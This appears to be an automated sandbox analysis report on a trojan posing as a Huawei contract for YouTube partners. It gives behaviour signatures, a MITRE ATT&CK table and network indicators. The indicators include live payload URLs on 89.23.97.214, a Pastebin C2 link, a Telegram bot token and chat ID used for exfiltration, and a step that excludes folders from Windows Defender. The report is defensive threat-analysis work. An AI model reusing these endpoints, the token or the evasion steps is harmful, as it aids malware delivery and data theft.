Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244168674.000002774F737000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		111
Process Injection		1
Masquerading		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		2
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		11
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
System Network Configuration Discovery		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617339 Sample: [Huawei] Contract for YouTu... Startdate: 17/02/2025 Architecture: WINDOWS Score: 100 37 pastebin.com 2->37 39 api.telegram.org 2->39 41 2 other IPs or domains 2->41 51 Suricata IDS alerts for network traffic 2->51 53 Antivirus detection for URL or domain 2->53 55 Multi AV Scanner detection for submitted file 2->55 61 6 other signatures 2->61 9 [Huawei] Contract for YouTube partners.exe 12 2->9         started        signatures3 57 Connects to a pastebin service (likely for C&C) 37->57 59 Uses the Telegram API (likely for C&C communication) 39->59 process4 dnsIp5 43 ip-api.com 208.95.112.1, 49785, 80 TUT-ASUS United States 9->43 45 api.telegram.org 149.154.167.220, 443, 49792, 50001 TELEGRAMRU United Kingdom 9->45 47 2 other IPs or domains 9->47 63 Adds a directory exclusion to Windows Defender 9->63 13 powershell.exe 14 24 9->13         started        18 powershell.exe 23 9->18         started        20 powershell.exe 9->20         started        signatures6 process7 dnsIp8 49 pastebin.com 172.67.19.24, 443, 49706 CLOUDFLARENETUS United States 13->49 35 C:\Users\user\AppData\...\jwryu2yd.cmdline, Unicode 13->35 dropped 65 Writes to foreign memory regions 13->65 22 csc.exe 3 13->22         started        25 conhost.exe 13->25         started        67 Loading BitLocker PowerShell Module 18->67 27 conhost.exe 18->27         started        29 conhost.exe 20->29         started        file9 signatures10 process11 file12 33 C:\Users\user\AppData\Local\...\jwryu2yd.dll, PE32 22->33 dropped 31 cvtres.exe 1 22->31         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
[Huawei] Contract for YouTube partners.exe24%ReversingLabsWin64.Trojan.Nekark
[Huawei] Contract for YouTube partners.exe11%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://ns.adobe.c.0/ti0%Avira URL Cloudsafe
http://89.23.97.214/Team/BILLI.exe0%Avira URL Cloudsafe
http://89.23.97.214:80/0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/SystemV0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer0%Avira URL Cloudsafe
http://89.23.97.214/Team/32cv.exe:0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/System.Xml0%Avira URL Cloudsafe
http://89.23.97.214/Team/BILLI.exehttp://89.23.97.214/Team/32cv.exe0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/System.Runtime.Serialization0%Avira URL Cloudsafe
http://89.23.97.214/Team/32cv.exe100%Avira URL Cloudmalware
http://89.23.97.214/Team/BILLI.exe:0%Avira URL Cloudsafe
http://api.ipify.orgx0%Avira URL Cloudsafe
http://api.ipify.orgnotification_sent.flag0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/System.Xml.Linq0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/System.IO0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/SystemY0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
104.26.12.205
truefalse
    		high
    ip-api.com
    		208.95.112.1
    		truefalse
      		high
      api.telegram.org
      		149.154.167.220
      		truefalse
        		high
        pastebin.com
        		172.67.19.24
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessagefalse
            		high
            https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-4642404996false
              		high
              https://pastebin.com/raw/WHKzW2nrfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.datacontract.org/2004/07/SystemV[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://html4/loose.dtd[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://ns.adobe.hotosh[Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                      		high
                      http://ns.adobe.c.0/ti[Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://89.23.97.214/Team/BILLI.exe[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://ns.photo/[Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://ns.a.0/sTy[Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.datacontract.org[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://go.microsoft.copowershell.exe, 00000009.00000002.2446866312.0000020D2068A000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                		high
                                https://aka.ms/dotnet/info[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  https://aka.ms/winforms-warnings/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA5E6000.00000004.10000000.00040000.00000000.sdmpfalse
                                    		high
                                    http://89.23.97.214/Team/BILLI.exehttp://89.23.97.214/Team/32cv.exe[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.microsoft.copowershell.exe, 00000002.00000002.2247608619.0000016DD6CFB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2450396016.0000020D20A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Licensepowershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/dotnet/app-launch-failed[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                          		high
                                          http://schemas.datacontract.org/2004/07/System.Xml[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://.css[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/dotnet-core-applaunch?[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/dotnet/runtime[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249747447.000002B7E9640000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245331226.0000027751290000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249503089.000002B7E9590000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247337256.000002B7E6560000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244925040.000002774F991000.00000020.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://api.telegram.org:443/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540B9000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754067000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-464240[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754067000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ip-api.com:80/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://aka.ms/dotnet-warnings/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://ip-api.com/json/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754039000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://aka.ms/nativeaot-compatibility[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://github.com/dotnet/runtime/issues/71847[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/serializationformat-binary-obsolete[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://contoso.com/powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2229378708.0000016DCE5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2266658120.00000224101B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://api.ipify.org/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://aka.ms/binaryformatter[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://github.com/mono/linker/pull/649[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247740081.000002B7E6AF0000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2193285575.0000016DBE551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2198121281.0000022400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D082D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://.jpg[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                        		high
                                                                                        https://aka.ms/systemdrawingnonwindows[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2229378708.0000016DCE5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2266658120.00000224101B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://ip-api.com/json/8.46.123.189x[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754039000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://ip-api.com/json/P[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://89.23.97.214:80/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754083000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://ns.adoraw-se[Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2193285575.0000016DBE779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.datacontract.org/2004/07/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247740081.000002B7E6AF0000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
